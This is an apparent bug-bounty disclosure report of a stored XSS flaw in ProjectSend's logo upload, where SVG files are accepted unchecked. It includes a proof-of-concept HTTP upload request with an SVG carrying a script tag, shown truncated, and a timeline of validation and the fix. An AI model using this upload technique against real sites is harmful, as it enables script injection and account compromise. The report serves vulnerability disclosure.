Unrestricted File Upload with Dangerous Type to XSS in projectsend/projectsend


Reported on

Apr 2nd 2023


In upload logo website not validate extension and content of file when upload logo. It can upload a svg contain XSS payload\

Allowed file extensions: not have svg Example Image

Proof of Concept

POST /projectsend/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14793753624573663602990508963
Content-Length: 1024
Origin: http://localhost
Connection: close
Referer: http://localhost/projectsend/options.php?section=branding
Cookie: eid=1; remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; phpipam=70a06actbf4lbrmme77sko8gps; table-page-size=50; PHPSESSID=hmco0v4thtknae5mjdst6fk23d
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Content-Disposition: form-data; name="csrf_token"

Content-Disposition: form-data; name="section"

Content-Disposition: form-data; name="MAX_FILE_SIZE"

Content-Disposition: form-data; name="select_logo"; filename="test.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">

Alert: Example Image


If successful, a cross site scripting attack can severely impact websites and web applications, damage their reputation and relationships with customers. XXS can deface websites, can result in compromised user accounts, and can run malicious code on web pages

We are processing your report and will contact the projectsend team within 24 hours. 8 months ago
We have contacted a member of the projectsend team and are waiting to hear back 8 months ago
Ignacio Nelson validated this vulnerability 8 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ignacio Nelson marked this as fixed in >r1605 with commit 9c1391 8 months ago
Ignacio Nelson has been awarded the fix bounty
This vulnerability will not receive a CVE
Ignacio Nelson published this vulnerability 8 months ago
options.php#L276-L299 has been validated
to join this conversation